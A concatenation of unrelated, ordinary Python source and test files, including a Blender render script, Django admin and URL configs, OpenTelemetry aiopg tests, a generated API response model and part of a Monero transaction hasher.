bpy.ops.wm.save_as_mainfile(filepath=out)
# From https://stackoverflow.com/questions/11130156/suppress-stdout-stderr-print-from-python-functions
class Suppressor(object):
'''
A context manager for doing a "deep suppression" of stdout and stderr in
Python, i.e. will suppress all print, even if the print originates in a
compiled C/Fortran sub-function.
This will not suppress raised exceptions, since exceptions are printed
to stderr just before a script exits, and after the context manager has
exited (at least, I think that is why it lets exceptions through).
'''
def __init__(self):
# Open a pair of null files
self.null_fds = [os.open(os.devnull,os.O_RDWR) for x in range(2)]
# Save the actual stdout (1) and stderr (2) file descriptors.
self.save_fds = [os.dup(1), os.dup(2)]
def __enter__(self):
# Assign the null pointers to stdout and stderr.
os.dup2(self.null_fds[0],1)
os.dup2(self.null_fds[1],2)
def __exit__(self, *_):
# Re-assign the real stdout/stderr back to (1) and (2)
os.dup2(self.save_fds[0],1)
os.dup2(self.save_fds[1],2)
# Close all file descriptors
for fd in self.null_fds + self.save_fds:
os.close(fd)
def parser(args):
p = argparse.ArgumentParser(description = 'Renders blockworld scene')
p.add_argument('--scene', type = json.loads,
help = 'Tower json describing the scene.')
p.add_argument('--trace', type = json.loads,
help = 'Trace json for physics.')
p.add_argument('--out', type = str,
help = 'Path to save rendering')
p.add_argument('--wireframe', action = 'store_true',
help = 'Render objects as wireframes')
p.add_argument('--save_world', action = 'store_true',
help = 'Save the resulting blend scene')
p.add_argument('--render_mode', type = str, default = 'default',
choices = ['default', 'motion', 'frozen', 'none'],
help = 'mode to render')
p.add_argument('--resolution', type = int, nargs = 2,
default = (256,256), help = 'Render resolution')
return p.parse_args(args)
def main():
argv = sys.argv
print(argv[:6])
if '--' in sys.argv:
argv = sys.argv[sys.argv.index('--') + 1:]
args = parser(argv)
scene = BlockScene(args.scene, args.trace, wire_frame = args.wireframe)
path = os.path.join(args.out, 'render')
if not os.path.isdir(path):
os.mkdir(path)
frozen_path = os.path.join(path, 'frozen')
motion_path = os.path.join(path, 'motion')
n_frames = len(args.trace['position'])
if args.render_mode == 'default' or args.render_mode == 'frozen':
scene.render_circle(frozen_path, freeze = True, dur = 2,
resolution = args.resolution)
if args.render_mode == 'default' or args.render_mode == 'motion':
scene.render(motion_path, np.arange(n_frames),
resolution = args.resolution)
if args.render_mode == 'none':
for frame in range(n_frames):
scene.frame_set(frame)
if args.save_world:
path = os.path.join(args.out, 'world.blend')
scene.save(path)
if __name__ == '__main__':
main()
|
from ..Block import Block
class LoadSegBlock(Block):
def __init__(self, blkdev, blk_num=0):
Block.__init__(self, blkdev, blk_num, chk_loc=2, is_type=Block.LSEG)
def create(self, host_id=0, next=Block.no_blk, size=128):
Block.create(self)
self.size = size
self.host_id = host_id
self.next = next
def write(self):
if self.data == None:
self._create_data()
self._put_long(1, self.size)
self._put_long(3, self.host_id)
self._put_long(4, self.next)
Block.write(self)
def set_data(self, data):
if self.data == None:
self._create_data()
self.data[20:20+len(data)] = data
self.size = (20 + len(data)) / 4
def get_data(self):
return self.data[20:20+(self.size-5)*4]
def read(self):
Block.read(self)
if not self.valid:
return False
self.size = self._get_long(1)
self.host_id = self._get_long(3)
self.next = self._get_long(4)
return self.valid
def dump(self):
Block.dump(self, "RDBlock")
print " size: %d" % self.size
print " host_id: %d" % self.host_id
print " next: %s" % self._dump_ptr(self.next)
|
import pytest
import StocksMA.StocksMA as stm
@pytest.mark.parametrize(
"company",
[
"CIH",
"maroc telecom",
"involys",
"total",
"telecom",
"label",
"central",
"sothema",
"MNG",
"salaf",
"CIH",
"Auto Nejma",
],
)
def test_get_isin_company(company) -> None:
obj = stm.get_isin(company)
assert len(obj[1]) != 0
assert isinstance(obj, tuple)
@pytest.mark.parametrize(
"not_company",
[
"",
"123",
"aaaaa",
"bank",
"maroc",
"agricol",
"centrale",
],
)
@pytest.mark.xfail(raises=Exception)
def test_get_isin_not_company(not_company) -> None:
stm.get_isin(not_company)
def test_get_market_status() -> None:
stat = stm.get_market_status()
assert isinstance(stat, str)
|
from django.contrib import admin
from django.utils import timezone
# Register your models here.
from smarttm_web.models import Participation_Type, Position, User, Club, Participation, Member, EC_Member, Meeting, Evaluation, Attendance
class PositionAdmin(admin.ModelAdmin):
list_display = ('name', 'seniority')
class UserAdmin(admin.ModelAdmin):
list_display = ('email', 'full_name', 'is_staff', 'is_admin', 'last_login', 'get_groups')
class ParticipationTypeAdmin(admin.ModelAdmin):
list_display = ('name', 'category')
class MemberAdmin(admin.ModelAdmin):
list_display = ('user', 'club', 'paid_status', 'active', 'is_EC')
class ParticipationAdmin(admin.ModelAdmin):
list_display = ('member', 'club', 'participation_type', 'meeting')
admin.site.register(Participation_Type, ParticipationTypeAdmin)
admin.site.register(User, UserAdmin)
admin.site.register(Position, PositionAdmin)
admin.site.register(Club)
admin.site.register(Participation, ParticipationAdmin)
admin.site.register(Member, MemberAdmin)
admin.site.register(EC_Member)
admin.site.register(Meeting)
admin.site.register(Attendance)
admin.site.register(Evaluation)
|
import numpy as np
import pytest
from sklego.common import flatten
from sklego.linear_model import LowessRegression
from tests.conftest import nonmeta_checks, regressor_checks, general_checks
@pytest.mark.parametrize(
"test_fn", flatten([nonmeta_checks, general_checks, regressor_checks])
)
def test_estimator_checks(test_fn):
lowess = LowessRegression()
test_fn(LowessRegression.__name__, lowess)
def test_obvious_usecase():
x = np.linspace(0, 10, 100)
X = x.reshape(-1, 1)
y = np.ones(x.shape)
y_pred = LowessRegression().fit(X, y).predict(X)
assert np.isclose(y, y_pred).all() |
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import logging
from unittest import mock
from unittest.mock import MagicMock
import aiopg
from aiopg.utils import _ContextManager, _PoolAcquireContextManager
import opentelemetry.instrumentation.aiopg
from opentelemetry import trace as trace_api
from opentelemetry.instrumentation.aiopg import AiopgInstrumentor, wrappers
from opentelemetry.instrumentation.aiopg.aiopg_integration import (
AiopgIntegration,
)
from opentelemetry.sdk import resources
from opentelemetry.test.test_base import TestBase
def async_call(coro):
loop = asyncio.get_event_loop()
return loop.run_until_complete(coro)
class TestAiopgInstrumentor(TestBase):
def setUp(self):
super().setUp()
self.origin_aiopg_connect = aiopg.connect
self.origin_aiopg_create_pool = aiopg.create_pool
aiopg.connect = mock_connect
aiopg.create_pool = mock_create_pool
def tearDown(self):
super().tearDown()
aiopg.connect = self.origin_aiopg_connect
aiopg.create_pool = self.origin_aiopg_create_pool
with self.disable_logging():
AiopgInstrumentor().uninstrument()
def test_instrumentor_connect(self):
AiopgInstrumentor().instrument()
cnx = async_call(aiopg.connect(database="test"))
cursor = async_call(cnx.cursor())
query = "SELECT * FROM test"
async_call(cursor.execute(query))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
# Check version and name in span's instrumentation info
self.check_span_instrumentation_info(
span, opentelemetry.instrumentation.aiopg
)
# check that no spans are generated after uninstrument
AiopgInstrumentor().uninstrument()
cnx = async_call(aiopg.connect(database="test"))
cursor = async_call(cnx.cursor())
query = "SELECT * FROM test"
cursor.execute(query)
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
def test_instrumentor_create_pool(self):
AiopgInstrumentor().instrument()
pool = async_call(aiopg.create_pool(database="test"))
cnx = async_call(pool.acquire())
cursor = async_call(cnx.cursor())
query = "SELECT * FROM test"
async_call(cursor.execute(query))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
# Check version and name in span's instrumentation info
self.check_span_instrumentation_info(
span, opentelemetry.instrumentation.aiopg
)
# check that no spans are generated after uninstrument
AiopgInstrumentor().uninstrument()
pool = async_call(aiopg.create_pool(database="test"))
cnx = async_call(pool.acquire())
cursor = async_call(cnx.cursor())
query = "SELECT * FROM test"
cursor.execute(query)
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
def test_custom_tracer_provider_connect(self):
resource = resources.Resource.create({})
result = self.create_tracer_provider(resource=resource)
tracer_provider, exporter = result
AiopgInstrumentor().instrument(tracer_provider=tracer_provider)
cnx = async_call(aiopg.connect(database="test"))
cursor = async_call(cnx.cursor())
query = "SELECT * FROM test"
async_call(cursor.execute(query))
spans_list = exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertIs(span.resource, resource)
def test_custom_tracer_provider_create_pool(self):
resource = resources.Resource.create({})
result = self.create_tracer_provider(resource=resource)
tracer_provider, exporter = result
AiopgInstrumentor().instrument(tracer_provider=tracer_provider)
pool = async_call(aiopg.create_pool(database="test"))
cnx = async_call(pool.acquire())
cursor = async_call(cnx.cursor())
query = "SELECT * FROM test"
async_call(cursor.execute(query))
spans_list = exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertIs(span.resource, resource)
def test_instrument_connection(self):
cnx = async_call(aiopg.connect(database="test"))
query = "SELECT * FROM test"
cursor = async_call(cnx.cursor())
async_call(cursor.execute(query))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 0)
cnx = AiopgInstrumentor().instrument_connection(cnx)
cursor = async_call(cnx.cursor())
async_call(cursor.execute(query))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
def test_uninstrument_connection(self):
AiopgInstrumentor().instrument()
cnx = async_call(aiopg.connect(database="test"))
query = "SELECT * FROM test"
cursor = async_call(cnx.cursor())
async_call(cursor.execute(query))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
cnx = AiopgInstrumentor().uninstrument_connection(cnx)
cursor = async_call(cnx.cursor())
async_call(cursor.execute(query))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
class TestAiopgIntegration(TestBase):
def setUp(self):
super().setUp()
self.tracer = self.tracer_provider.get_tracer(__name__)
def test_span_succeeded(self):
connection_props = {
"database": "testdatabase",
"server_host": "testhost",
"server_port": 123,
"user": "testuser",
}
connection_attributes = {
"database": "database",
"port": "server_port",
"host": "server_host",
"user": "user",
}
db_integration = AiopgIntegration(
self.tracer, "testcomponent", "testtype", connection_attributes
)
mock_connection = async_call(
db_integration.wrapped_connection(
mock_connect, {}, connection_props
)
)
cursor = async_call(mock_connection.cursor())
async_call(cursor.execute("Test query", ("param1Value", False)))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertEqual(span.name, "testcomponent.testdatabase")
self.assertIs(span.kind, trace_api.SpanKind.CLIENT)
self.assertEqual(span.attributes["component"], "testcomponent")
self.assertEqual(span.attributes["db.type"], "testtype")
self.assertEqual(span.attributes["db.instance"], "testdatabase")
self.assertEqual(span.attributes["db.statement"], "Test query")
self.assertEqual(
span.attributes["db.statement.parameters"],
"('param1Value', False)",
)
self.assertEqual(span.attributes["db.user"], "testuser")
self.assertEqual(span.attributes["net.peer.name"], "testhost")
self.assertEqual(span.attributes["net.peer.port"], 123)
self.assertIs(
span.status.canonical_code,
trace_api.status.StatusCanonicalCode.OK,
)
def test_span_not_recording(self):
connection_props = {
"database": "testdatabase",
"server_host": "testhost",
"server_port": 123,
"user": "testuser",
}
connection_attributes = {
"database": "database",
"port": "server_port",
"host": "server_host",
"user": "user",
}
mock_tracer = mock.Mock()
mock_span = mock.Mock()
mock_span.is_recording.return_value = False
mock_tracer.start_span.return_value = mock_span
mock_tracer.use_span.return_value.__enter__ = mock_span
mock_tracer.use_span.return_value.__exit__ = True
db_integration = AiopgIntegration(
mock_tracer, "testcomponent", "testtype", connection_attributes
)
mock_connection = async_call(
db_integration.wrapped_connection(
mock_connect, {}, connection_props
)
)
cursor = async_call(mock_connection.cursor())
async_call(cursor.execute("Test query", ("param1Value", False)))
self.assertFalse(mock_span.is_recording())
self.assertTrue(mock_span.is_recording.called)
self.assertFalse(mock_span.set_attribute.called)
self.assertFalse(mock_span.set_status.called)
def test_span_failed(self):
db_integration = AiopgIntegration(self.tracer, "testcomponent")
mock_connection = async_call(
db_integration.wrapped_connection(mock_connect, {}, {})
)
cursor = async_call(mock_connection.cursor())
with self.assertRaises(Exception):
async_call(cursor.execute("Test query", throw_exception=True))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertEqual(span.attributes["db.statement"], "Test query")
self.assertIs(
span.status.canonical_code,
trace_api.status.StatusCanonicalCode.UNKNOWN,
)
self.assertEqual(span.status.description, "Test Exception")
def test_executemany(self):
db_integration = AiopgIntegration(self.tracer, "testcomponent")
mock_connection = async_call(
db_integration.wrapped_connection(mock_connect, {}, {})
)
cursor = async_call(mock_connection.cursor())
async_call(cursor.executemany("Test query"))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertEqual(span.attributes["db.statement"], "Test query")
def test_callproc(self):
db_integration = AiopgIntegration(self.tracer, "testcomponent")
mock_connection = async_call(
db_integration.wrapped_connection(mock_connect, {}, {})
)
cursor = async_call(mock_connection.cursor())
async_call(cursor.callproc("Test stored procedure"))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertEqual(
span.attributes["db.statement"], "Test stored procedure"
)
def test_wrap_connect(self):
aiopg_mock = AiopgMock()
with mock.patch("aiopg.connect", aiopg_mock.connect):
wrappers.wrap_connect(self.tracer, "-")
connection = async_call(aiopg.connect())
self.assertEqual(aiopg_mock.connect_call_count, 1)
self.assertIsInstance(connection.__wrapped__, mock.Mock)
def test_unwrap_connect(self):
wrappers.wrap_connect(self.tracer, "-")
aiopg_mock = AiopgMock()
with mock.patch("aiopg.connect", aiopg_mock.connect):
connection = async_call(aiopg.connect())
self.assertEqual(aiopg_mock.connect_call_count, 1)
wrappers.unwrap_connect()
connection = async_call(aiopg.connect())
self.assertEqual(aiopg_mock.connect_call_count, 2)
self.assertIsInstance(connection, mock.Mock)
def test_wrap_create_pool(self):
async def check_connection(pool):
async with pool.acquire() as connection:
self.assertEqual(aiopg_mock.create_pool_call_count, 1)
self.assertIsInstance(
connection.__wrapped__, AiopgConnectionMock
)
aiopg_mock = AiopgMock()
with mock.patch("aiopg.create_pool", aiopg_mock.create_pool):
wrappers.wrap_create_pool(self.tracer, "-")
pool = async_call(aiopg.create_pool())
async_call(check_connection(pool))
def test_unwrap_create_pool(self):
async def check_connection(pool):
async with pool.acquire() as connection:
self.assertEqual(aiopg_mock.create_pool_call_count, 2)
self.assertIsInstance(connection, AiopgConnectionMock)
aiopg_mock = AiopgMock()
with mock.patch("aiopg.create_pool", aiopg_mock.create_pool):
wrappers.wrap_create_pool(self.tracer, "-")
pool = async_call(aiopg.create_pool())
self.assertEqual(aiopg_mock.create_pool_call_count, 1)
wrappers.unwrap_create_pool()
pool = async_call(aiopg.create_pool())
async_call(check_connection(pool))
def test_instrument_connection(self):
connection = mock.Mock()
# Avoid get_attributes failing because can't concatenate mock
connection.database = "-"
connection2 = wrappers.instrument_connection(
self.tracer, connection, "-"
)
self.assertIs(connection2.__wrapped__, connection)
def test_uninstrument_connection(self):
connection = mock.Mock()
# Set connection.database to avoid a failure because mock can't
# be concatenated
connection.database = "-"
connection2 = wrappers.instrument_connection(
self.tracer, connection, "-"
)
self.assertIs(connection2.__wrapped__, connection)
connection3 = wrappers.uninstrument_connection(connection2)
self.assertIs(connection3, connection)
with self.assertLogs(level=logging.WARNING):
connection4 = wrappers.uninstrument_connection(connection)
self.assertIs(connection4, connection)
# pylint: disable=unused-argument
async def mock_connect(*args, **kwargs):
database = kwargs.get("database")
server_host = kwargs.get("server_host")
server_port = kwargs.get("server_port")
user = kwargs.get("user")
return MockConnection(database, server_port, server_host, user)
# pylint: disable=unused-argument
async def mock_create_pool(*args, **kwargs):
database = kwargs.get("database")
server_host = kwargs.get("server_host")
server_port = kwargs.get("server_port")
user = kwargs.get("user")
return MockPool(database, server_port, server_host, user)
class MockPool:
def __init__(self, database, server_port, server_host, user):
self.database = database
self.server_port = server_port
self.server_host = server_host
self.user = user
async def release(self, conn):
return conn
def acquire(self):
"""Acquire free connection from the pool."""
coro = self._acquire()
return _PoolAcquireContextManager(coro, self)
async def _acquire(self):
connect = await mock_connect(
self.database, self.server_port, self.server_host, self.user
)
return connect
class MockPsycopg2Connection:
def __init__(self, database, server_port, server_host, user):
self.database = database
self.server_port = server_port
self.server_host = server_host
self.user = user
class MockConnection:
def __init__(self, database, server_port, server_host, user):
self._conn = MockPsycopg2Connection(
database, server_port, server_host, user
)
# pylint: disable=no-self-use
def cursor(self):
coro = self._cursor()
return _ContextManager(coro)
async def _cursor(self):
return MockCursor()
def close(self):
pass
class MockCursor:
# pylint: disable=unused-argument, no-self-use
async def execute(self, query, params=None, throw_exception=False):
if throw_exception:
raise Exception("Test Exception")
# pylint: disable=unused-argument, no-self-use
async def executemany(self, query, params=None, throw_exception=False):
if throw_exception:
raise Exception("Test Exception")
# pylint: disable=unused-argument, no-self-use
async def callproc(self, query, params=None, throw_exception=False):
if throw_exception:
raise Exception("Test Exception")
class AiopgConnectionMock:
_conn = MagicMock()
async def __aexit__(self, exc_type, exc_val, exc_tb):
pass
async def __aenter__(self):
return MagicMock()
class AiopgPoolMock:
async def release(self, conn):
return conn
def acquire(self):
coro = self._acquire()
return _PoolAcquireContextManager(coro, self)
async def _acquire(self):
return AiopgConnectionMock()
class AiopgMock:
def __init__(self):
self.connect_call_count = 0
self.create_pool_call_count = 0
async def connect(self, *args, **kwargs):
self.connect_call_count += 1
return MagicMock()
async def create_pool(self, *args, **kwargs):
self.create_pool_call_count += 1
return AiopgPoolMock()
|
import datetime
from django.conf import settings
from google.appengine.api import app_identity
SETTINGS_PREFIX = "DJANGAE_BACKUP_"
def get_backup_setting(name, required=True, default=None):
settings_name = "{}{}".format(SETTINGS_PREFIX, name)
if required and not hasattr(settings, settings_name):
raise Exception("{} is required".format(settings_name))
return getattr(settings, settings_name, default)
def get_gcs_bucket():
"""Get a bucket from DJANGAE_BACKUP_GCS_BUCKET setting. Defaults to the
default application bucket with 'djangae-backups' appended.
Raises an exception if DJANGAE_BACKUP_GCS_BUCKET is missing and there is
no default bucket.
"""
try:
bucket = settings.DJANGAE_BACKUP_GCS_BUCKET
except AttributeError:
bucket = app_identity.get_default_gcs_bucket_name()
if bucket:
bucket = '{}/djangae-backups'.format(bucket)
if not bucket:
raise Exception('No DJANGAE_BACKUP_GCS_BUCKET or default bucket')
return bucket
def get_backup_path():
bucket = get_gcs_bucket()
# And then we create a new, time-stamped directory for every backup run.
# This will give us UTC even if USE_TZ=False and we aren't running on
# App Engine (local development?).
dt = datetime.datetime.utcnow()
bucket_path = '{}/{:%Y%m%d-%H%M%S}'.format(bucket, dt)
return bucket_path
|
from libfuturize.fixes.fix_future_standard_library import FixFutureStandardLibrary
|
from django.db import models
class DropBoxListener(models.Model):
listen = models.IntegerField()
|
from django.conf.urls import url
from .import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns=[
url('^$', views.index, name='index'),
url(r'^search/', views.search_photos, name='searchPhotos'),
url(r'^location/', views.search_location, name='locationPhoto')
]
if settings.DEBUG:
urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT) |
def separar(lst):
if lst == []:
return [], []
a, b = lst[0]
la, lb = separar(lst[1:])
return [a]+la, [b]+lb
def remove_e_conta(lst, element):
if lst == []:
return [], 0
lst1, count = remove_e_conta(lst[1:], element)
if lst[0] == element:
return lst1, count + 1
else:
return [lst[0]] + lst1, count
def count_elements(lst, final=[]): # TODO: dunno
if lst == []:
return ()
if __name__ == "__main__":
lst = [(1,4), (2,3), (3,2), (4,1)]
print(f"separa: {separar(lst)}")
print(f"remove e conta: {remove_e_conta([1, 6, 2, 5, 5, 2, 5, 2], 2)}")
print(f"") |
"""
Pylibui test suite.
"""
from pylibui.controls import ProgressBar
from tests.utils import WindowTestCase
class ProgressBarTest(WindowTestCase):
def setUp(self):
super().setUp()
self.progressbar = ProgressBar()
def test_value_initial_value(self):
"""Tests the progressbar's `value` initial value is zero."""
self.assertEqual(self.progressbar.value, 0)
def test_value_can_be_changed(self):
"""Tests the progressbar's `value` attribute can be changed."""
value = 30
self.progressbar.value = value
self.assertEqual(self.progressbar.value, value)
# TODO: should we check for variable type to avoid app crashes ?
# NOTE: weirdly enough, the sliders don't crash like this; this may
# be a bug in libui.
# with self.assertRaises(ValueError):
# self.progressbar.set_value('hello')
|
# -*- coding: utf-8 -*-
"""
neutrino_api
This file was automatically generated for NeutrinoAPI by APIMATIC v2.0 ( https://apimatic.io ).
"""
class URLInfoResponse(object):
"""Implementation of the 'URL Info Response' model.
TODO: type model description here.
Attributes:
http_status_message (int): The HTTP status message assoicated with the
status code
server_region (string): The servers IP geo-location: full region name
(if detectable)
query (dict<object, string>): A key-value map of the URL query
paramaters
server_name (string): The name of the server software hosting this
URL
url_port (int): The URL port
server_country (string): The servers IP geo-location: full country
name
real (bool): Is this URL actually serving real content
server_city (string): The servers IP geo-location: full city name (if
detectable)
url_path (string): The URL path
url (string): The fully qualified URL. This may be different to the
URL requested if http-redirect is true
valid (bool): Is this a valid well-formed URL
server_hostname (string): The servers hostname (PTR record)
load_time (int): The time taken to load the URL content in seconds
http_ok (bool): True if this URL responded with an HTTP OK (200)
status
content_size (int): The size of the URL content in bytes
http_status (int): The HTTP status code this URL responded with. An
HTTP status of 0 indicates a network level issue
server_country_code (string): The servers IP geo-location: ISO
2-letter country code
content_encoding (string): The encoding format the URL uses
server_ip (string): The IP address of the server hosting this URL
url_protocol (string): The URL protocol, usually http or https
content_type (string): The content-type this URL serves
http_redirect (bool): True if this URL responded with an HTTP
redirect
content (string): The actual content this URL responded with. Only set
if the 'fetch-content' option was used
is_timeout (bool): True if a timeout occurred while loading the URL.
You can set the timeout with the request parameter 'timeout'
"""
# Create a mapping from Model property names to API property names
_names = {
"http_status_message":'httpStatusMessage',
"server_region":'serverRegion',
"query":'query',
"server_name":'serverName',
"url_port":'urlPort',
"server_country":'serverCountry',
"real":'real',
"server_city":'serverCity',
"url_path":'urlPath',
"url":'url',
"valid":'valid',
"server_hostname":'serverHostname',
"load_time":'loadTime',
"http_ok":'httpOk',
"content_size":'contentSize',
"http_status":'httpStatus',
"server_country_code":'serverCountryCode',
"content_encoding":'contentEncoding',
"server_ip":'serverIp',
"url_protocol":'urlProtocol',
"content_type":'contentType',
"http_redirect":'httpRedirect',
"content":'content',
"is_timeout":'isTimeout'
}
def __init__(self,
http_status_message=None,
server_region=None,
query=None,
server_name=None,
url_port=None,
server_country=None,
real=None,
server_city=None,
url_path=None,
url=None,
valid=None,
server_hostname=None,
load_time=None,
http_ok=None,
content_size=None,
http_status=None,
server_country_code=None,
content_encoding=None,
server_ip=None,
url_protocol=None,
content_type=None,
http_redirect=None,
content=None,
is_timeout=None):
"""Constructor for the URLInfoResponse class"""
# Initialize members of the class
self.http_status_message = http_status_message
self.server_region = server_region
self.query = query
self.server_name = server_name
self.url_port = url_port
self.server_country = server_country
self.real = real
self.server_city = server_city
self.url_path = url_path
self.url = url
self.valid = valid
self.server_hostname = server_hostname
self.load_time = load_time
self.http_ok = http_ok
self.content_size = content_size
self.http_status = http_status
self.server_country_code = server_country_code
self.content_encoding = content_encoding
self.server_ip = server_ip
self.url_protocol = url_protocol
self.content_type = content_type
self.http_redirect = http_redirect
self.content = content
self.is_timeout = is_timeout
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
http_status_message = dictionary.get('httpStatusMessage')
server_region = dictionary.get('serverRegion')
query = dictionary.get('query')
server_name = dictionary.get('serverName')
url_port = dictionary.get('urlPort')
server_country = dictionary.get('serverCountry')
real = dictionary.get('real')
server_city = dictionary.get('serverCity')
url_path = dictionary.get('urlPath')
url = dictionary.get('url')
valid = dictionary.get('valid')
server_hostname = dictionary.get('serverHostname')
load_time = dictionary.get('loadTime')
http_ok = dictionary.get('httpOk')
content_size = dictionary.get('contentSize')
http_status = dictionary.get('httpStatus')
server_country_code = dictionary.get('serverCountryCode')
content_encoding = dictionary.get('contentEncoding')
server_ip = dictionary.get('serverIp')
url_protocol = dictionary.get('urlProtocol')
content_type = dictionary.get('contentType')
http_redirect = dictionary.get('httpRedirect')
content = dictionary.get('content')
is_timeout = dictionary.get('isTimeout')
# Return an object of this model
return cls(http_status_message,
server_region,
query,
server_name,
url_port,
server_country,
real,
server_city,
url_path,
url,
valid,
server_hostname,
load_time,
http_ok,
content_size,
http_status,
server_country_code,
content_encoding,
server_ip,
url_protocol,
content_type,
http_redirect,
content,
is_timeout)
|
from monero_glue.xmr import crypto
from monero_glue.xmr.sub.keccak_hasher import HashWrapper
from monero_serialize import xmrserialize
class PreMlsagHasher(object):
"""
Iterative construction of the pre_mlsag_hash
"""
def __init__(self, state=None):
from monero_glue.xmr.sub.keccak_hasher import HashWrapper, KeccakXmrArchive
self.is_simple = state[0] if state else None
self.state = state[1] if state else 0
self.kc_master = HashWrapper(state[2] if state else crypto.get_keccak())
self.rsig_hasher = state[3] if state else crypto.get_keccak()
self.rtcsig_hasher = None
if state:
self.rtcsig_hasher = KeccakXmrArchive(state[4]) if state[4] else None
else:
self.rtcsig_hasher = KeccakXmrArchive()
def state_save(self):
return (
self.is_simple,
self.state,
self.kc_master.ctx,
self.rsig_hasher,
self.rtcsig_hasher.ctx() if self.rtcsig_hasher else None,
)
def state_load(self, x):
from monero_glue.xmr.sub.keccak_hasher import HashWrapper, KeccakXmrArchive
self.is_simple = x[0]
self.state = x[1]
self.kc_master = HashWrapper(x[2])
self.rsig_hasher = x[3]
if x[4]:
self.rtcsig_hasher = KeccakXmrArchive(x[4])
else:
self.rtcsig_hasher = None
def init(self, is_simple):
if self.state != 0:
raise ValueError("State error")
self.state = 1
self.is_simple = is_simple
async def set_message(self, message):
self.kc_master.update(message)
async def set_type_fee(self, rv_type, fee):
if self.state != 1:
raise ValueError("State error")
self.state = 2
from monero_serialize.xmrtypes import RctSigBase
rfields = RctSigBase.f_specs()
await self.rtcsig_hasher.message_field(None, field=rfields[0], fvalue=rv_type)
await self.rtcsig_hasher.message_field(None, field=rfields[1], fvalue=fee)
async def set_pseudo_out(self, out):
if self.state != 2 and self.state != 3:
raise ValueError("State error")
self.state = 3
from monero_serialize.xmrtypes import KeyV
await self.rtcsig_hasher.field(out, KeyV.ELEM_TYPE)
async def set_ecdh(self, ecdh, raw=True):
if self.state != 2 and self.state != 3 and self.state != 4:
raise ValueError("State error")
self.state = 4
if raw:
await self.rtcsig_hasher.buffer(ecdh)
else:
from monero_serialize.xmrtypes import EcdhInfo
await self.rtcsig_hasher.field(ecdh, EcdhInfo.ELEM_TYPE)
async def set_out_pk(self, out_pk, mask=None):
if self.state != 4 and self.state != 5:
raise ValueError("State error")
self.state = 5
from monero_serialize.xmrtypes import ECKey
await self.rtcsig_hasher.field(mask if mask else out_pk, ECKey)
async def rctsig_base_done(self):
if self.state != 5:
raise ValueError("State error")
self.state = 6
c_hash = self.rtcsig_hasher.get_digest()
self.kc_master.update(c_hash)
self.rtcsig_hasher = None
async def rsig_val(self, p, bulletproof, raw=False):
if self.state == 8:
raise ValueError("State error")
if raw:
if isinstance(p, list):
for x in p:
self.rsig_hasher.update(x)
else:
self.rsig_hasher.update(p)
return
if bulletproof:
self.rsig_hasher.update(p.A)
self.rsig_hasher.update(p.S)
self.rsig_hasher.update(p.T1)
self.rsig_hasher.update(p.T2)
self.rsig_hasher.update(p.taux)
self.rsig_hasher.update(p.mu)
for i in range(len(p.L)):
self.rsig_hasher.update(p.L[i])
for i in range(len(p.R)):
self.rsig_hasher.update(p.R[i])
self.rsig_hasher.update(p.a)
self.rsig_hasher.update(p.b)
self.rsig_hasher.update(p.t)
else:
for i in range(64):
self.rsig_hasher.update(p.asig.s0[i])
for i in range(64):
self.rsig_hasher.update(p.asig.s1[i])
self.rsig_hasher.update(p.asig.ee)
for i in range(64):
self.rsig_hasher.update(p.Ci[i])
async def get_digest(self):
if self.state != 6:
raise ValueError("State error")
self.state = 8
c_hash = self.rsig_hasher.digest()
self.rsig_hasher = None
self.kc_master.update(c_hash)
return self.kc_master.digest()
async def get_pre_mlsag_hash(rv):
"""
Generates final message for the Ring CT signature
:param rv:
:type rv: RctSig
:return:
"""
from monero_glue.xmr.sub.keccak_hasher import get_keccak_writer
from monero_serialize.xmrtypes import RctType
kc_master = HashWrapper(crypto.get_keccak())
kc_master.update(rv.message)
is_simple = rv.type in [RctType.Simple, RctType.Bulletproof, RctType.Bulletproof2]
outputs = len(rv.ecdhInfo)
inputs = 0
if rv.type == RctType.Simple:
inputs = len(rv.pseudoOuts)
elif rv.type in [RctType.Bulletproof, RctType.Bulletproof2]:
inputs = len(rv.p.pseudoOuts)
kwriter = get_keccak_writer()
ar = xmrserialize.Archive(kwriter, True)
await rv.serialize_rctsig_base(ar, inputs, outputs)
c_hash = kwriter.get_digest()
kc_master.update(c_hash)
kc = crypto.get_keccak()
if rv.type in [RctType.Bulletproof, RctType.Bulletproof2]:
for p in rv.p.bulletproofs:
kc.update(p.A)
kc.update(p.S)
kc.update(p.T1)
kc.update(p.T2)
kc.update(p.taux)
kc.update(p.mu)
